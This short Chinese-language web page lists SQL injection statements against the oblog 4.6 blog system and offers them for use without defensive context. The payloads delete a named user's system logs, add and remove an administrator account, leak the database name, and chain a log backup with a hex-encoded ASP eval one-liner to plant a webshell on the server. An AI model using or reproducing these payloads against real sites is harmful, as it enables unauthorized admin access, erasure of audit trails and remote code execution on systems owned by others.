oblog 4.6 注入的语句

攻心由分享更新时间：2024-06-29 12:27:38

投诉

oblog 4.6 注入的语句

s'/**/WHERE/**/logid=21949;delete/**/from/**/oblog_syslog/**/where/**/ username='duyao';--删除指定用户日志

s'/**/WHERE/**/logid=21949;insert/**/into/**/oblog_admin/**/ (username,password,roleid)values('duyao','00b1d1380814062d',0);-- 添加指定用户

s'/**/WHERE/**/logid=21949;delete/**/from/**/oblog_admin/**/where/**/ username='duyao';-- 删除指定用户

备份获得webshell

s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--

s'/**/WHERE/**/logid=21949;create/**/table/**/cmd/**/(a/**/image);--

s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/ **/'c:\zj1244'/**/with/**/init;--

s'/**/WHERE/**/logid=21949;insert/**/into/**/cmd/**/(a)/**/ values(0x3C256576616C2072657175657374286368722833352929253E);--

s'/**/WHERE/**/logid=21949;backup/**/log/**/hh/**/to/**/disk/**/=/ **/'c:\a\a\';--

s'/**/WHERE/**/logid=21949;Drop/**/table/**/cmd;--

s'/**/WHERE/**/logid=21949;s' WHERE logid=1;update oblog_user set useremail=db_name() where username='duyao';--